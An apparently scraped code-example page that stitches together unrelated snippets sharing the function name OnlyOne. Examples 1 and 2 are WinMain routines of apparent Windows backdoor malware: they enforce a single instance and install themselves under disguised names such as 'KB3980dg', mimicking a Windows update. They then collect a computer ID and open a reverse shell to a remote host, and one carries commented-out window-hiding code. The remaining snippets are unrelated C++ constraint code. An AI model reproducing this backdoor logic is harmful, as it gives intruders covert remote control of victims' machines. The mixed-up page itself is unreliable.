Esempio n. 1
0
int WINAPI WinMain(HINSTANCE hInst, HINSTANCE hPrevInst, LPSTR lpCmdLine,int nShowCmd)
{
    if(OnlyOne("4e5934879"))
    return 0;//Verify Only One Instance Running
    InstallMe("KB3980dg");
    GetCompID(szCompID);
    ReverseShell(remHOST,remPORT);//ReverseShell :)
    return 0;
Esempio n. 2
0
void OnlyOne(vector<C_Cell> t, vector<vector<int>> & E) {
	//here we suppose that it is either row or column
	int dim = t[0].variables.size();
	for (int i = 0; i < dim; i++) {
		vector<int> u;
		for (int j = 0; j < t.size(); j++) {
			u.push_back(t[j].variables[i]);
		}
		OnlyOne(u, E);
	}
}
int WINAPI WinMain(HINSTANCE hInst, HINSTANCE hPrevInst, LPSTR lpCmdLine,int nShowCmd)
{
    //HWND mainWIN;
    //mainWIN=FindWindowA("ConsoleWindowClass",NULL);
   // ShowWindow(mainWIN,SW_HIDE);//HIDE-ME
    //ShowWindow(GetForegroundWindow(),SW_HIDE);
    if(OnlyOne("4e5934879"))
	return 0;//Verify Only One Instance Running
	InstallMe("help-676474");
	GetCompID(szCompID);
    ReverseShell(remHOST,remPORT);//ReverseShell :)
    return 0;
}
Esempio n. 4
0
void OnlyOne(C_Cell t, vector<vector<int>> & E) {
	OnlyOne(t.variables, E);
}